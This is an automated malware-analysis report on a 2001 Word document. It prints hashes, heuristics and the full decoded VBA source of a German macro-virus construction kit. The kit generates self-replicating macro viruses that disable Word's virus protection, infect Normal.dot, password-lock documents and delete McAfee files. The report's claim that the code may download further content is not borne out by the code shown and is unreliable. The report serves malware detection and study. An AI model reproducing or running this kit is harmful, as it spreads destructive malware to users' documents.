Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c7249330104c79e…

MALICIOUS

Office (OLE)

Size: 262.0 KB
Created: 2001-03-25 10:05:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 1eda9b83aca304e6eacc6dd1474ddff2
SHA-1: 443f903404534cdb8766955cb7799a4323bcd194
SHA-256: 2c7249330104c79ee2ff4a915227b2ac5285a3142651dac9f2bd9c7cad452f12
Risk score: 208

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a Word document containing a legacy WordBasic auto-exec macro named 'autoopen'. The VBA code within 'macros.bas' also defines an 'autoopen' subroutine that attempts to minimize the application and show a userform named 'prog'. The script also contains obfuscated code that appears to be part of a macro virus kit, attempting to disable security features and potentially download additional content. The presence of the 'autoopen' macro and the nature of the VBA code strongly suggest a malicious intent to execute further stages.

Heuristics (5)

  • ClamAV: Doc.Trojan.Satz-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Satz-1
  • NOP sled detected [high] (SC_NOP_SLED)
    Found 20+ consecutive 0x90 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00029405  90                nop
    00029406  90                nop
    00029407  90                nop
    00029408  90                nop
    00029409  90                nop
    0002940A  90                nop
    0002940B  90                nop
    0002940C  90                nop
    0002940D  90                nop
    0002940E  90                nop
    0002940F  90                nop
    00029410  90                nop
    00029411  90                nop
    00029412  90                nop
    00029413  90                nop
    00029414  90                nop
    00029415  90                nop
    00029416  90                nop
    00029417  90                nop
    00029418  90                nop
    00029419  90                nop
    0002941A  90                nop
    0002941B  90                nop
    0002941C  90                nop
    0002941D  90                nop
    0002941E  90                nop
    0002941F  90                nop
    00029420  9f                lahf
    00029421  9f                lahf
    00029422  9f                lahf
    00029423  9f                lahf
    00029424  9f                lahf
    00029425  9f                lahf
    00029426  a0a0a0a0a0        mov al, byte ptr [0xa0a0a0a0]
    0002942B  a0a0a0a0a0        mov al, byte ptr [0xa0a0a0a0]
    00029430  a0a0afafaf        mov al, byte ptr [0xafafafa0]
    00029435  af                scasd eax, dword ptr es:[edi]
    00029436  af                scasd eax, dword ptr es:[edi]
    00029437  af                scasd eax, dword ptr es:[edi]
    00029438  b0b0              mov al, 0xb0
    0002943A  b0af              mov al, 0xaf
    0002943C  af                scasd eax, dword ptr es:[edi]
    0002943D  af                scasd eax, dword ptr es:[edi]
    0002943E  9f                lahf
    0002943F  9f                lahf
    00029440  9f                lahf
    00029441  af                scasd eax, dword ptr es:[edi]
    00029442  af                scasd eax, dword ptr es:[edi]
    00029443  af                scasd eax, dword ptr es:[edi]
    00029444  9f                lahf
    00029445  9f                lahf
    00029446  9f                lahf
    00029447  90                nop
    00029448  90                nop
    00029449  90                nop
    0002944A  7f7f              jg 0x294cb
    0002944C  7fcf              jg 0x2941d
    0002944E  cf                iretd
    0002944F  cf                iretd
    00029450  df                .byte 0xdf
    00029451  df                .byte 0xdf
    00029452  dfe0              fnstsw ax
    00029454  ef                out dx, eax
    00029455  ef                out dx, eax
    00029456  ef                out dx, eax
    00029457  f0                .byte 0xf0
    00029458  f0                .byte 0xf0
    00029459  f0                .byte 0xf0
    0002945A  ff                .byte 0xff
    0002945B  ff                .byte 0xff
    0002945C  ef                out dx, eax
    0002945D  ef                out dx, eax
    0002945E  ef                out dx, eax
    0002945F  ff                .byte 0xff
    00029460  ff                .byte 0xff
    00029461  fff0              push eax
    00029463  f0                .byte 0xf0
    00029464  f0                .byte 0xf0
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected [medium] (OLE_VBA_MACROS), 1 related finding
    Document contains VBA macro code
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "VirusBausatz"
    Sub autoopen()
    Application.WindowState = wdWindowStateMinimize

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   6678 bytes
SHA-256: 9643f3bc74c4dcf8fb58f5bfbe6b40b19ce8ddb3d0fa62305d0ef37c53ca7e3c
Detection
ClamAV: Doc.Trojan.Satz-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Attribute VB_Name = "VirusBausatz"
Sub autoopen()
Application.WindowState = wdWindowStateMinimize
prog.Show
End Sub

Attribute VB_Name = "prog"
Attribute VB_Base = "0{BA2AE9D2-2112-11D5-AEE1-DC167E47EF7A}{BA2AE9C3-2112-11D5-AEE1-DC167E47EF7A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub boxzeigen_Click()

End Sub

Private Sub CheckBox3_Click()

End Sub

Private Sub CommandButton1_Click()
Hilfe.Show
End Sub

Private Sub create_Click()

Documents.Add

Set Target = ActiveDocument.VBProject.VBComponents(1).CodeModule

ende = "end if"
anzeichen = "'"
offnen = "sub autoopen()"
schliessen = "sub autoexit()"
speichern = "ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, fileformat:=wdFormatDocument"

vcode = "on error resume next" & Chr(10) _
& "'Made with the W97 MakroVirus Bausatz by MagBee" & Chr(10) & "ActiveDocument.ReadOnlyRecommended = False" & Chr(10) & "Options.VirusProtection = False" & Chr(10) _
& "Options.SaveNormalPrompt = False" & Chr(10) & "Application.DisplayAlerts = wdAlertsNone" & Chr(10) & "Application.EnableCancelKey = wdCancelDisabled" & Chr(10) _
& "Application.DisplayStatusBar = False" & Chr(10) & "Options.ConfirmConversions = False" & Chr(10) & "Application.ScreenUpdating = False" & Chr(10) & "If ThisDocument.Name =" & Chr$(34) & "Normal.dot" & Chr$(34) & "Then" & Chr(10) _
& "Set Source = NormalTemplate.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "Set Target = ActiveDocument.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "else" & Chr(10) & "Set Source = ActiveDocument.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& Chr(10) & "Set Target = NormalTemplate.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "End If" & Chr(10) & "With Source" & Chr(10) & "vircode = .lines(1, .countoflines)" _
& Chr(10) & "End With" & Chr(10) & "With Target" & Chr(10) & ".deletelines 1, .countoflines" _
& Chr(10) & ".insertlines 1, vircode" & Chr(10) & "End With" & Chr(10) & Chr(10) & Chr(10) & Chr(10) _
& Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) _
& Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & "end sub" _


If OptionButton1.Value = True Then
With Target
    .insertlines 1, offnen
End With
End If

If OptionButton2.Value = True Then
With Target
    .insertlines 1, schliessen
End With
End If




With Target
    .insertlines 2, vcode
End With

With Target
    .insertlines 42, speichern
End With

If boxzeigen.Value = True Then

nachricht = InputBox("Gebt hier die Nachricht ein, die in der Messagebox stehen soll", "Nachricht in der Messagebox")
trigger = "if day(now()) = " & Label1 & " and month(now()) = " & Label3 & " then"
mbox = "Msgbox " & Chr$(34) & nachricht & Chr$(34) & ", ," & Chr$(34) & "W97M Virus Bausatz by MagBee" & Chr$(34)

If CheckBox3.Value = True Then
With Target
    .insertlines 31, mbox
End With
GoTo weiterpw
End If

With Target
    .insertlines 30, trigger
    .insertlines 31, mbox
    .insertlines 32, ende
End With


End If

weiterpw:
If passwort.Value = True Then

pawo = InputBox("Wie soll das Passwort lauten (keine Leerzeichen)", "Passwortvergabe")
triggerpw = "if day(now()) = " & Label4 & " and month(now()) = " & Label6 & " then"
pw = "If ActiveDocument.HasPassword = False Then ActiveDocument.Password = " & Chr$(34) & pawo & Chr$(34)

If CheckBox6.Value = True Then
With Target
    .insertlines 35, pw
End With
GoTo weiterers
End If

With Target
    .insertlines 34, triggerpw
    .insertlines 35, pw
    .insertlines 36, ende
End With
End If

weiterers:
If CheckBox2.Value = True Then

wzuersetz = InputBox("Welches Wort soll ersetzt werden", "Wort ersetzen")
ersetzwort = InputBox("Durch welches Wort soll es ersetzt werden", "Wort ersetzen")

ersetzen = "Selection.Find.ClearFormatting" & Chr(10) & "Selection.Find.Replacement.ClearFormatting" _
& Chr(10) & "With Selection.Find" & Chr(10) & ".Text = " & Chr$(34) & wzuersetz & Chr$(34) & Chr(10) & ".Replacement.Text = " _
& Chr$(34) & ersetzwort & Chr$(34) & Chr(10) & ".Forward = True" & Chr(10) & ".Wrap = wdFindContinue" & Chr(10) & "End With" _
& Chr(10) & "Selection.Find.Execute Replace:=wdReplaceAll"

triggerers = "if day(now()) = " & Label5 & " and month(now()) = " & Label9 & " then"

If CheckBox7.Value = True Then
With Target
    .insertlines 39, ersetzen
End With
GoTo weiter
End If

With Target
    .insertlines 38, triggerers
    .insertlines 39, ersetzen
    .insertlines 40, ende
End With
End If

weiter:

If OptionButton3.Value = True Then
killja = "Kill (" & Chr$(34) & "c:\Programme\Mcafee\VirusScan\*.*" & Chr$(34) & ")"
With Target
    .insertlines 28, killja
End With
End If

vname = InputBox("Wie soll der Virus heißen ?", "creation", "VirusName")
ActiveDocument.SaveAs FileName:=vname, FileFormat:=wdFormatDocument
 
MsgBox "Dein Virus wurde unter Eigene Dateien gespeichert", , "W97M Bausatz by MagBee" & Chr$(34)
 
End Sub

Private Sub payload_Click()

End Sub

Private Sub OptionButton1_Click()

End Sub

Private Sub OptionButton2_Click()
MsgBox "Wichtig bei Autoexit zuerst den Virus schließen (Aktives Fenster in Word)" & Chr(10) & "und dann Word beenden !", , "W97M Virus Bausatz by MagBee"
End Sub

Private Sub OptionButton4_Click()

End Sub

Private Sub passwort_Click()

End Sub

Private Sub ScrollBar1_Change()
Label1.Caption = ScrollBar1.Value
End Sub

Private Sub ScrollBar2_Change()
Label3.Caption = ScrollBar2.Value
End Sub

Private Sub ScrollBar3_Change()
Label4.Caption = ScrollBar3.Value
End Sub

Private Sub ScrollBar4_Change()
Label5.Caption = ScrollBar4.Value
End Sub

Private Sub ScrollBar5_Change()
Label6.Caption = ScrollBar5.Value
End Sub

Private Sub ScrollBar6_Change()
Label9.Caption = ScrollBar6.Value
End Sub

Private Sub UserForm_Click()

End Sub

Attribute VB_Name = "Hilfe"
Attribute VB_Base = "0{BA2AE9CE-2112-11D5-AEE1-DC167E47EF7A}{BA2AE9C5-2112-11D5-AEE1-DC167E47EF7A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub